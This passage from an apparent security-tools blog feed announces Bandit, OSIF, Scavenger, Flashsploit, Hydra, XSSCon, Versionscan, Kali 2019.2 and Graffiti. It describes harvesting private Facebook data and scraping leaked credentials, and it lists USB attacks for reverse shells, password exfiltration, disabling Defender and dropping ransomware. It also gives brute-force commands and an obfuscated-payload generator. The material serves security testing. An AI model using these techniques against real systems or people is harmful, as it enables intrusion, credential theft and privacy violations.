[--ini INI_PATH] [--version]
[targets [targets ...]]

Bandit - a Python source code security analyzer

positional arguments:
targets source file(s) or directory(s) to be tested

optional arguments:
-h, --help show this help message and exit
-r, --recursive find and process files in subdirectories
-a {file,vuln}, --aggregate {file,vuln}
aggregate output by vulnerability (default) or by
filename
-n CONTEXT_LINES, --number CONTEXT_LINES
maximum number of code lines to output for each issue
-c CONFIG_FILE, --configfile CONFIG_FILE
optional config file to use for selecting plugins and
overriding defaults
-p PROFILE, --profile PROFILE
profile to use (defaults to executing all tests)
-t TESTS, --tests TESTS
comma-separated list of test IDs to run
-s SKIPS, --skip SKIPS
comma-separated list of test IDs to skip
-l, --level report only issues of a given severity level or higher
(-l for LOW, -ll for MEDIUM, -lll for HIGH)
-i, --confidence report only issues of a given confidence level or
higher (-i for LOW, -ii for MEDIUM, -iii for HIGH)
-f {cs v,custom,html,json,screen,txt,xml,yaml}, --format {csv,custom,html,json,screen,txt,xml,yaml}
specify output format
--msg-template MSG_TEMPLATE
specify output message template (only usable with
--format custom), see CUSTOM FORMAT section for list
of available values
-o [OUTPUT_FILE], --output [OUTPUT_FILE]
write report to filename
-v, --verbose output extra information like excluded and included
files
-d, --debug turn on debug mode
-q, --quiet, --silent
only show output in the case of an error
--ignore-nosec do not skip lines with # nosec comments
-x EXCLUDED_PATHS, --exclude EXCLUDED_PATHS
comma-separated list of paths (glob patterns supported)
to exclude from scan (not e that these are in addition
to the excluded paths provided in the config file)
-b BASELINE, --baseline BASELINE
path of a baseline report to compare against (only
JSON-formatted files are accepted)
--ini INI_PATH path to a .bandit file that supplies command line
arguments
--version show program's version number and exit

CUSTOM FORMATTING
-----------------

Available tags:

{abspath}, {relpath}, {line}, {test_id},
{severity}, {msg}, {confidence}, {range}

Example usage:

Default template:
bandit -r examples/ --format custom --msg-template \
"{abspath}:{line}: {test_id}[bandit]: {severity}: {msg}"

Provides same output as:
bandit -r examples/ --format custom

Tags can also be formatted in python string.format() style:
ban dit -r examples/ --format custom --msg-template \
"{relpath:20.20s}: {line:03}: {test_id:^8}: DEFECT: {msg:>20}"

See python documentation for more information about formatting style:
https://docs.python.org/3.4/library/string.html

The following tests were discovered and loaded:
-----------------------------------------------

B101 assert_used
B102 exec_used
B103 set_bad_file_permissions
B104 hardcoded_bind_all_interfaces
B105 hardcoded_password_string
B106 hardcoded_password_funcarg
B107 hardcoded_password_default
B108 hardcoded_tmp_directory
B110 try_except_pass
B112 try_except_continue
B201 flask_debug_true
B301 pickle
B302 marshal
B303 md5
B304 ciphers
B305 cipher_modes
B306 mktemp_q
B307 eval
B308 mark_safe
B309 httpsconnection
B310 urllib_urlopen
B311 random
B312 telnetli b
B313 xml_bad_cElementTree
B314 xml_bad_ElementTree
B315 xml_bad_expatreader
B316 xml_bad_expatbuilder
B317 xml_bad_sax
B318 xml_bad_minidom
B319 xml_bad_pulldom
B320 xml_bad_etree
B321 ftplib
B322 input
B323 unverified_context
B324 hashlib_new_insecure_functions
B325 tempnam
B401 import_telnetlib
B402 import_ftplib
B403 import_pickle
B404 import_subprocess
B405 import_xml_etree
B406 import_xml_sax
B407 import_xml_expat
B408 import_xml_minidom
B409 import_xml_pulldom
B410 import_lxml
B411 import_xmlrpclib
B412 import_httpoxy
B413 import_pycrypto
B501 request_with_no_cert_validation
B502 ssl_with_bad_version
B503 ssl_with_bad_defaults
B504 ssl_with_no_version
B505 weak_cryptographic_key
B506 yaml_load
B507 ssh_no_host_key_verification
B601 paramiko_ calls
B602 subprocess_popen_with_shell_equals_true
B603 subprocess_without_shell_equals_true
B604 any_other_function_with_shell_equals_true
B605 start_process_with_a_shell
B606 start_process_with_no_shell
B607 start_process_with_partial_path
B608 hardcoded_sql_expressions
B609 linux_commands_wildcard_injection
B610 django_extra_used
B611 django_rawsql_used
B701 jinja2_autoescape_false
B702 use_of_mako_templates
B703 django_mark_safe


Baseline
Bandit allows specifying the path of a baseline report to compare against using the base line argument (i.e. -b BASELINE or --baseline BASELINE).
bandit -b BASELINE
This is useful for ignoring known vulnerabilities that you believe are non-issues (e.g. a cleartext password in a unit test). To generate a baseline report simply run Bandit with the output format set to json (only JSON-formatted files are accepted as a baseline) and output file path specified:
bandit -f json -o PATH_TO_OUTPUT_FILE


Version control integration
Use pre-commit. Once you have it installed, add this to the .pre-commit-config.yaml in your repository (be sure to update rev to point to a real git tag/revision!):
repos:
- repo: https://github.com/PyCQA/bandit
rev: '' # Update me!
hooks:
- id: bandit
Then run pre-commit install and you're ready to go.


Configuration
An optional config file may be supplied and may include:
  • lists of tests which should or shouldn't be run
  • exclude_dirs - sections of the path, that if matched, will be excluded from scanning (glob patterns supported)
  • overridden plugin settings - may provide different settings for some plugins


Per Project Command Line Args
Projects may include a .bandit file that specifies command line arguments that should be supplied for that project. The currently supported arguments are:
  • targets: comma separated list of target dirs/files to run bandit on
  • exclude: comma separated list of excluded paths
  • skips: comma separated list of tests to skip
  • tests: comma separated list of tests to run
To use this, put a .bandit file in your project's directory. For example:
[bandit]
exclude: /test
[bandit]
tests: B101,B102,B301


Exclusions
In the event that a line of code triggers a Bandit issue, but that the line has been reviewed and the issue is a false positive or acceptable for some other reason, the line can be marked with a # nosec and any results associated with it will not be reported.
For example, although this line may cause Bandit to report a potential security issue, it will not be reported:
self.process = subprocess.Popen('/bin/echo', shell=True)  # nosec


Vulnerability Tests
Vulnerability tests or "plugins" are defined in files in the plugins directory.
Tests are written in Python and are autodiscovered from the plugins directory. Each test can examine one or more type of Python statements. Tests are marked with the types of Python statements they examine (for example: function call, string, import, etc).
Tests are executed by the BanditNodeVisitor object as it visits each node in the AST.
Test results are maintained in the BanditResultStore and aggregated for output at the completion of a test run.


Writing Tests
To write a test:
  • Identify a vulnerability to build a test for, and create a new file in examples/ that contains one or more cases of that vulnerability.
  • Consider the vulnerability you're testing for, mark the function with one or more of the appropriate decorators: - @checks('Call') - @checks('Import', 'ImportFrom') - @checks('Str')
  • Create a new Python source file to contain your test, you can reference existing tests for examples.
  • The function that you create should take a parameter "context" which is an instance of the context class you can query for information about the current element being examined. You can also get the raw AST node for more advanced use cases. Please see the context.py file for more.
  • Extend your Bandit configuration file as needed to support your new test.
  • Execute Bandit against the test file you defined in examples/ and ensure that it detects the vulnerability. Consider variations on how this vulnerability might present itself and extend the example file and the test function accordingly.


Extending Bandit
Bandit allows users to write and register extensions for checks and formatters. Bandit will load plugins from two entry-points:
  • bandit.formatters
  • bandit.plugins
Formatters need to accept 4 things:
  • result_store: An instance of bandit.core.BanditResultStore
  • file_list: The list of files which were inspected in the scope
  • scores: The scores awarded to each file in the scope
  • excluded_files: The list of files that were excluded from the scope
Plugins tend to take advantage of the bandit.checks decorator which allows the author to register a check for a particular type of AST node. For example
@bandit.checks('Call')
def prohibit_unsafe_deserialization(context):
if 'unsafe_load' in context.call_function_name_qual:
return bandit.Issue(
severity=bandit.HIGH,
confidence=bandit.HIGH,
text="Unsafe deserialization detected."
)
To register your plugin, you have two options:
  1. If you're using setuptools directly, add something like the following to your setup call:
    # If you have an imaginary bson formatter in the bandit_bson module
    # and a function called `formatter`.
    entry_points={'bandit.formatters': ['bson = bandit_bson:formatter']}
    # Or a check for using mako templates in bandit_mako that
    entry_points={'bandit.plugins': ['mako = bandit_mako']}
  2. If you're using pbr, add something like the following to your setup.cfg file:
    [entry_points]
    bandit.formatters =
    bson = bandit_bson:formatter
    bandit.plugins =
    mako = bandit_mako


Contributing
Contributions to Bandit are always welcome!
The best way to get started with Bandit is to grab the source:
git clone https://github.com/PyCQA/bandit.git
You can test any changes with tox:
pip install tox
tox -e pep8
tox -e py27
tox -e py35
tox -e docs
tox -e cover
Please make PR requests using your own branch, and not master:
git checkout -b mychange
git push origin mychange


Reporting Bugs
Bugs should be reported on github. To file a bug against Bandit, visit: https://github.com/PyCQA/bandit/issues


Under Which Version of Python Should I Install Bandit?
The answer to this question depends on the project(s) you will be running Bandit against. If your project is only compatible with Python 2.7, you should install Bandit to run under Python 2.7. If your project is only compatible with Python 3.5, then use 3.5 respectively. If your project supports both, you could run Bandit with both versions but you don't have to.
Bandit uses the ast module from Python's standard library in order to analyze your Python code. The ast module is only able to parse Python code that is valid in the version of the interpreter from which it is imported. In other words, if you try to use Python 2.7's ast module to parse code written for 3.5 that uses, for example, yield from with asyncio, then you'll have syntax errors that will prevent Bandit from working properly. Alternatively, if you are relying on 2.7's octal notation of 0777 then you'll have a syntax error if you run Bandit on 3.x.


References
Bandit docs: https://bandit.readthedocs.io/en/latest/
Python AST module documentation: https://docs.python.org/2/library/ast.html
Green Tree Snakes - the missing Python AST docs: https://greentreesnakes.readthedocs.org/en/latest/
Documentation of the various types of AST nodes that Bandit currently covers or could be extended to cover: https://greentreesnakes.readthedocs.org/en/latest/nodes.html


OSIF - Open Source Information Facebook

$
0
0
OSIF is an accurate facebook account information gathering, all sensitive information can be easily gathered even though the target converts all of its privacy to (only me), Sensitive information about residence, date of birth, occupation, phone number and email address.

Installation
$ pkg update upgrade
$ pkg install git python2
$ git clone https://github.com/ciku370/OSIF
$ cd OSIF

Setup
$ pip2 install -r requirements.txt

Running
$ python2 osif.py

Screenshot

  • if you are confused how to use it, please type 'help' to display the help menu
  • [Warn] please turn off your VPN before using this program !!!
  • [Tips] do not overuse this program !!!


Scavenger - Crawler Searching For Credential Leaks On Different Paste Sites

$
0
0

Just the code of my OSINT bot searching for sensitive data leaks on different paste sites.
Search terms:
  • credentials
  • private RSA keys
  • Wordpress configuration files
  • MySQL connect strings
  • onion links
  • links to files hosted inside the onion network (PDF, DOC, DOCX, XLS, XLSX)
Keep in mind:
  1. This bot is not beautiful.
  2. The code is not complete so far. Some parts like integrating the credentials in a database are missing in this online repository.
  3. If you want to use this code, feel free to do so. Keep in mind you have to customize things to make it run on your system.

IMPORTANT
The bot can be run in two major modes:
  • API mode
  • Scraping mode (using TOR)
Is highly recommend using the API mode. It is the intended method of scraping pastes from Pastebin.com and it is just fair to do so. The only thing you need is a Pastebin.com PRO account and whitelist your public IP on their site.
To start the bot in API mode just run the program in the following way:
python run.py -0
However, it is not always possible to use this intended method, as you might be in NAT mode and therefore you do not have an IP exclusively (whitelisting your IP is not reasonable here). That is the reason beacuse is implemented a scraping mode where fast TOR cycles in combination with reasonable user agents are used to avoid IP blocking and Cloudflare captchas.
To start the bot in scraping mode run it in the following way:
python run.py -1
Important note: you need the TOR service installed on your system listening on port 9050. Additionally you need to add the following line to your /etc/tor/torrc file.
MaxCircuitDirtiness 30
This sets the maximum cycle time of TOR to 30 seconds.

Usage
To learn how to use the software you just need to call the run.py script with the -h/--help argument.
python run.py -h
Output:
  _________
/ _____/ ____ _____ ___ __ ____ ____ ____ ___________
\_____ \_/ ___\\__ \\ \/ // __ \ / \ / ___\_/ __ \_ __ \
/ \ \___ / __ \\ /\ ___/| | \/ /_/ > ___/| | \/
/_______ /\___ >____ /\_/ \___ >___| /\___ / \___ >__|
\/ \/ \/ \/ \//_____/ \/

usage: run.py [-h] [-0] [-1] [-2] [-ps]

Control software for the different modules of this paste crawler.

optional arguments:
-h, --help show this help message and exit
-0, --pastebinCOMapi Activate Pastebin.com module (using API)
-1, --pastebinCOMtor Activate Pastebin.com module (standard scraping using
TOR to avoid IP blocking)
-2, --pasteORG Activate Paste.org module
-ps, --pStatistic Show a simple statistic.
So far I only implemented the Pastebin.com module and I am working on Paste.org. I will add more modules and update this script over time.

Just start the Pastebin.com module separately...
python P_bot.py
Pastes are stored in data/raw_pastes until they are more then 48000. When they are more then 48000 they get filtered, ziped and moved to the archive folder. All pastes which contain credentials are stored in data/files_with_passwords

Keep in mind that at the moment only combinations like USERNAME:PASSWORD and other simple combinations are detected. However, there is a tool to search for proxy logs containing credentials.
You can search for proxy logs (URLs with username and password combinations) by using getProxyLogs.py file
python getProxyLogs.py data/raw_pastes

If you want to search the raw data for specific strings you can do it using searchRaw.py (really slow).
python searchRaw.py SEARCHSTRING

To see statistics of the bot just call
python status.py 

The file findSensitiveData.py searches a folder (with pastes) for sensitive data like credit cards, RSA keys or mysqli_connect strings. Keep in mind that this script uses grep and therefore is really slow on a big amount of paste files. If you want to analyze a big amount of pastes I recommend an ELK-Stack.
python findSensitiveData.py data/raw_pastes 

There are two scripts stalk_user.py/stalk_user_wrapper.py which can be used to monitor a specific twitter user. This means every tweet he posts gets saved and every containing URL gets downloaded. To start the stalker just execute the wrapper.
python stalk_user_wrapper.py


Flashsploit - Exploitation Framework For ATtiny85 Based HID Attacks

$
0
0

Flashsploit is an Exploitation Framework for Attacks using ATtiny85 HID Devices such as Digispark USB Development Board, flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in Metasploit-Framework if Required by the Script, in Summary : Automatic Script Generation with Automated msfconsole.


Features
  • TODO : Add Linux and OSX Scripts

Windows

Data Exfiltration
  • Extract all WiFi Passwords and Uploads an XML to SFTP Server:

  • Extract Network Configuration Information of Target System and Uploads to SFTP Server:

  • Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server:

Reverse Shells
  • Get Reverse Shell by Abusing Microsoft HTML Apps (mshta):

  • Get Reverse Shell by Abusing Certification Authority Utility (certutil)
  • Get Reverse Shell by Abusing Windows Script Host (csript)
  • Get Reverse Shell by Abusing Windows Installer (msiexec)
  • Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)

Miscellaneous
  • Change Wallpaper of Target Machine:

  • Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage)

  • Drop and Execute a File of your Choice, a ransomware maybe? ;)
  • Disable Windows Defender Service on Target Machine

Tested on
  • Kali Linux 2019.2
  • BlackArch Linux

Dependencies
Flashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS :
  • Metasploit-Framework
  • Python 3
  • SFTP
  • PHP
If you think I should still make an Install Script, Open an issue.

Usage
git clone https://github.com/thewhiteh4t/flashsploit.git 
cd flashsploit
python3 flashsploit.py



Hydra 9.0 - Fast and Flexible Network Login Hacker

$
0
0

Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.
THIS TOOL IS FOR LEGAL PURPOSES ONLY!
There are already several login hacker tools available, however, none does either support more than one protocol to attack or support parallelized connects.
It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.
Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
However the module engine for new services is very easy so it won't take a long time until even more services are supported. 

WHERE TO GET
You can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases If you are interested in the current development state, the public development repository is at Github: svn co https://github.com/vanhauser-thc/thc-hydra or git clone https://github.com/vanhauser-thc/thc-hydra Use the development version at your own risk. It contains new features and new bugs. Things might not work!

HOW TO COMPILE
To configure, compile and install hydra, just type:
./configure
make
make install
If you want the ssh module, you have to setup libssh (not libssh2!) on your system, get it from http://www.libssh.org, for ssh v1 support you also need to add "-DWITH_SSH1=On" option in the cmake command line. IMPORTANT: If you compile on MacOS then you must do this - do not install libssh via brew!
If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution):
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
firebird-dev libmemcached-dev
This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the apple filing protocol - which you will need to download and install from the vendor's web sites.
For all other Linux derivates and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually.

SUPPORTED PLATFORMS
  • All UNIX platforms (Linux, *BSD, Solaris, etc.)
  • MacOS (basically a BSD clone)
  • Windows with Cygwin (both IPv4 and IPv6)
  • Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

HOW TO USE
If you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options.
Note that NO login/password file is included. Generate them yourself. A default password list is however present, use "dpl4hydra.sh" to generate a list.
For Linux users, a GTK GUI is available, try ./xhydra
For the command line usage, the syntax is as follows: For attacking one target or a network, you can use the new "://" style: hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS The old mode can be used for these too, and additionally if you want to specify your targets from a text file, you must use this one:
hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]
Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.
PROTOCOL is the protocol you want to use for attacking, e.g. ftp, smtp, http-get or many others are available TARGET is the target you want to attack MODULE-OPTIONS are optional values which are special per PROTOCOL module
FIRST - select your target you have three options on how to specify the target you want to attack:
  1. a single target on the command line: just put the IP or DNS address in
  2. a network range on the command line: CIDR specification like "192.168.0.0/24"
  3. a list of hosts in a text file: one line per entry (see below)
SECOND - select your protocol Try to avoid telnet, as it is unreliable to detect a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target.
THIRD - check if the module has optional parameters hydra -U PROTOCOL e.g. hydra -U smtp
FOURTH - the destination port this is optional! if no port is supplied the default common port for the PROTOCOL is used. If you specify SSL to use ("-S" option), the SSL common port is used by default.
If you use "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack: hydra [some command line options] ftp://[192.168.0.0/24]/ hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM
Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only!
If you want to supply your targets via a text file, you can not use the :// notation but use the old style and just supply the protocol (and module options): hydra [some command line options] -M targets.txt ftp You can supply also the port for each target entry by adding ":" after a target entry in the file, e.g.:
foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121
Note that if you want to attach IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:
foo.bar.com
target.com:21
[fe80::1%eth0]
[2001::1]
[2002::2]:8080
[2a01:24a:133:0:00:123:ff:1a]

LOGINS AND PASSWORDS
You have many options on how to attack with logins and passwords With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries. e.g.:
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/
Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters:
s - try the login as password
n - try an empty password
r - reverse the login and try it as password
If you want to, e.g. try "try login as password and "empty password", you specify "-e sn" on the command line.
But there are two more modes for trying passwords than -p/-P: You can use text file which where a login and password pair is separated by a colon, e.g.:
admin:password
test:test
foo:bar
This is a common default account style listing, that is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option - note that in this mode you can not use -l/-L/-p/-P options (-e nsr however you can). Example:
hydra -C default_accounts.txt ftp://localhost/
And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C):
-x minimum_length:maximum_length:charset
the charset definition is a for lowercase letters, A for uppercase letters, 1 for numbers and for anything else you supply it is their real representation. Examples:
-x 1:3:a generate passwords from length 1 to 3 with all lowercase letters
-x 2:5:/ generate passwords from length 2 to 5 containing only slashes
-x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
Example:
hydra -l ftp -x 3:3:a ftp://localhost/

SPECIAL OPTIONS FOR MODULES
Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it!
To see the special option of a module, type:
hydra -U
e.g.
./hydra -U http-post-form
The special options can be passed via the -m parameter, as 3rd command line option or in the service://target/option format.
Examples (they are all equal):
./hydra -l test -p test -m PLAIN 127.0.0.1 imap
./hydra -l test -p test 127.0.0.1 imap PLAIN
./hydra -l test -p test imap://127.0.0.1/PLAIN

RESTORING AN ABORTED/CRASHED SESSION
When hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes. NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX)

HOW TO SCAN/CRACK OVER A PROXY
The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid:
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"
HYDRA_PROXY_HTTP="proxylist.txt"
The last example is a text file containing up to 64 proxies (in the same format definition as the other examples).
For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax. eg:
HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port
for example:
HYDRA_PROXY=connect://proxy.anonymizer.com:8000
HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080
HYDRA_PROXY=socksproxylist.txt

ADDITIONAL HINTS
  • sort your password files by likelihood and use the -u option to find passwords much faster!
  • uniq your dictionary files! this can save you a lot of time :-) cat words.txt | sort | uniq > dictionary.txt
  • if you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing a least one letter and one number, etc. use the tool pw-inspector which comes along with the hydra package to reduce the password list: cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

RESULTS OUTPUT
The results are output to stdio along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported:
  • text - plain text format
  • jsonv1 - JSON data using version 1.x of the schema (defined below).
  • json - JSON data using the latest version of the schema, currently there is only version 1.
If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra.

JSON Schema
Here is an example of the JSON output. Notes on some of the fields:
  • errormessages - an array of zero or more strings that are normally printed to stderr at the end of the Hydra's run. The text is very free form.
  • success - indication if Hydra ran correctly without error (NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion.
  • quantityfound - How many username+password combinations discovered.
  • jsonoutputversion - Version of the schema, 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make second tuple of the version to always be two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output.
Version 1.00 example:
{
"errormessages": [
"[ERROR] Error Message of Something",
"[ERROR] Another Message",
"These are very free form"
],
"generator": {
"built": "2019-03-01 14:44:22",
"commandline": "hydra -b jsonv1 -o results.json ... ...",
"jsonoutputversion": "1.00",
"server": "127.0.0.1",
"service": "http-post-form",
"software": "Hydra",
"version": "v8.5"
},
"quantityfound": 2,
"results": [
{
"host": "127.0.0.1",
"login": "bill@example.com",
"password": "bill",
"port": 9999,
"service": "http-post-form"
},
{
"host": "127.0.0.1",
"login": "joe@example.com",
"password": "joe",
"port": 9999,
"service": "http-post-form"
}
],
"success": false
}

SPEED
through the parallelizing feature, this password cracker tool can be very fast, however it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher - the faster ;-) (but too high - and it disables the service)

STATISTICS
Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 tries invalid logins, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down.
   P A R A L L E L    T A S K S
SERVICE 1 4 8 16 32 50 64 100 128
------- --------------------------------------------------------------------
telnet 23:20 5:58 2:58 1:34 1:05 0:33 0:45* 0:25* 0:55*
ftp 45:54 11:51 5:54 3:06 1:25 0:58 0:46 0:29 0:32
pop3 92:10 27:16 13:56 6:42 2:55 1:57 1:24 1:14 0:50
imap 31:05 7:41 3:51 1:58 1:01 0:39 0:32 0:25 0:21
(*) Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown...
guesses per task (rounded up):
295 74 38 19 10 6 5 3 3
guesses possible per connect (depends on the server software and config):
telnet 4 ftp 6 pop3 1 imap 3


XSSCon - Simple XSS Scanner Tool

$
0
0

Powerfull Simple XSSScanner made with python 3.7

Installing
Requirements:

  • BeautifulSoup4

  • pip install bs4

  • requests

  • pip install requests

  • python 3.7

  • Commands:
    git clone https://github.com/menkrep1337/XSSCon
    cd XSSCon
    python3 xsscon.py --help

    Usage
    Basic usage:
    python3 xsscon.py -u http://testphp.vulnweb.com

    Advanced usage see help:
    python3 xsscon.py --help

    Roadmap

    v0.3B:

  • Added custom options ( Such --proxy, --user-agent etc... )
  • First launched


  • v0.3B Patch:

  • Added support for form method GET


  • Versionscan - A PHP Version Scanner For Reporting Possible Vulnerabilities

    $
    0
    0

    Versionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in to report back potential issues.
    PLEASE NOTE: Work is still in progress to adapt the tool to linux distributions that backport security fixes. As of right now, this only reports back for the straight up version reported.

    Installation

    Using Composer
    {
    "require": {
    "psecio/versionscan": "dev-master"
    }
    }
    The only current dependency is the Symfony console.

    Usage
    To run the scan against your current PHP version, use:
    bin/versionscan
    The script will check the PHP_VERSION for the current instance and generate the pass/fail results. The output looks similar to:
    Executing against version: 5.4.24
    +--------+---------------+------+------------------------------------------------------------------------------------------------------+
    | Status | CVE ID | Risk | Summary |
    +--------+---------------+------+------------------------------------------------------------------------------------------------------+
    | FAIL | CVE-2014-3597 | 6.8 | Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP before 5.4.32 ... |
    | FAIL | CVE-2014-3587 | 4.3 | Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in... |
    Results will be reported back colorized as well to easily show the pass/fail of the check.

    Parameters
    There are several parameters that can be given to the tool to configure its scans and results:

    PHP Version
    If you'd like to define a PHP version to check other than the one the script finds itself, you can use the php-version parameter:
    bin/versionscan scan --php-version=4.3.2

    Report Only Failures
    You can also tell the versionscan to only report back the failures and not the passing tests:
    bin/versionscan scan --fail-only

    Sorting results
    You can also sort the results either by the CVE ID or by severity (risk rating), with the sort parameter and either the "cve" or "risk" value:
    bin/versionscan scan --sort=risk

    Output formats
    By default versionscan will output information directly to the console in a human-readable result. You can also specify other output formats that may be easier to parse programatically (like JSON). Use the --format option to change the output:
    vendor/bin/versionscan scan --php-version=5.5 --format=json
    Supported output formats are console, json, xml and html.
    The HTML output format requires an --output option of the directory to write the file:
    vendor/bin/versionscan scan --php-version=5.5 --format=html --output=/var/www/output
    The result will be written to a file named something like versionscan-output-20150808.html


    Kali Linux 2019.2 Release - Penetration Testing and Ethical Hacking Linux Distribution

    $
    0
    0

    This release brings the kernel up to version 4.19.28, fixes numerous bugs, includes many updated packages, and most excitingly, features a new release of Kali Linux NetHunter!

    Kali NetHunter 2019.2 Release

    NetHunter now supports over 50 devices running all the latest Android versions, from KitKat through to Pie.

    13 new NetHunter images have been released for the latest Android versions of your favorite devices, including:
    • Nexus 6 running Pie
    • Nexus 6P, Oreo
    • OnePlus2, Pie
    • Galaxy Tab S4 LTE & WiFi, Oreo
    These and many more can be downloaded from the NetHunter page.

    Tool Upgrades

    This release largely features various tweaks and bug fixes but there are still many updated tools including seclists, msfpc, and exe2hex.
    For the complete list of updates, fixes, and additions, please refer to the Kali Bug Tracker Changelog.

    ARM Updates

    For the ARM users, be aware that the first boot will take a bit longer than usual, as it requires the reinstallation of a few packages on the hardware. This manifests as the login manager crashing a few times until the packages finish reinstalling and is expected behaviour.

    Upgrade to Kali Linux 2019.2

    If you already have a Kali installation you’re happy with, you can easily upgrade in place as follows.
    root@kali:~# apt update && apt -y full-upgrade

    Ensuring your Installation is Updated

    To double check your version, first make sure your Kali package repositories are correct.
    root@kali:~# cat /etc/apt/sources.list
    deb http://http.kali.org/kali kali-rolling main non-free contrib

    Then after running ‘apt -y full-upgrade’, you may require a ‘reboot’ before checking:
    root@kali:~# grep VERSION /etc/os-release
    VERSION="2019.2"
    VERSION_ID="2019.2"

    root@kali:~# uname -a
    Linux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux

    If you come across any bugs in Kali, please open a report on our bug tracker


    Graffiti - A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

    $
    0
    0

    NOTE: Never upload payloads to online checkers
    Graffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:
    • Python
    • Perl
    • Batch
    • Powershell
    • PHP
    • Bash
    Graffiti will also accept a language that is not currently on the list and store the oneliner into a database.

    Features
    Graffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:
    • Xor
    • Base64
    • Hex
    • ROT13
    • Raw
    Some features of Graffiti include:
    • Terminal drop in access, with the ability to run external commands
    • Ability to create your own payload JSON files
    • Ability to view cached payloads inside of the database
    • Ability to run the database in memory for quick deletion
    • Terminal history and saving of terminal history
    • Auto tab completion inside of terminal
    • Ability to securely wipe the history files and database file
    • Multiple encoding techniques as mentioned above

    Usage
